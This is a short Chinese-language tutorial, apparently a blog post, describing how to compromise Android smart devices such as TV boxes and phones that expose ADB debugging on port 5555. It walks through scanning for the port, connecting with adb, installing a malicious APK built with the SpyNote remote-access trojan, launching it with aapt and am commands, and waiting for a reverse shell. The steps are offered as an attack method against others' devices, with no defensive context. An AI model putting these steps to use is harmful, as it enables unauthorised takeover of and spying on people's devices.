1、很多智能设备,如:天猫盒子,手机等,在出厂不安全配置的情况下,容易出现调试端口对外暴露,甚至允许远程调试的情况,这种情况下,我们就可以通过adb远程调试,安装木马并使之运行。很多智能设备都是以安卓作为操作系统,这里只描述安卓智能设备的渗透方法。
2、安卓设备的调试端口一般开放在5555端口中,我们可以快速在网络中扫描5555端口的开放状态
3、找到开发5555端口的ip,用adb进行远程连接
adb connect x.x.x.x
4、可以使用spynote生成一个恶意apk,当然能手写也可以,然后用adb进行安装
adb install xxx.apk
5、用aapt查看包名和MainActivity名,下一步触发恶意应用要用到
aapt dump badging xxx.apk|grep package #取name字段 aapt dump badging xxx.apk|grep activity #取name字段
6、使用am命令触发该应用
am start -n 包名/activity名
7、等待接收反向shell,SpyNote会稍微方便点,现在最新版为4.0,可以免费下载到,自己写的,nc之类的自己想办法就好了
时间: 2024-10-20 22:40:22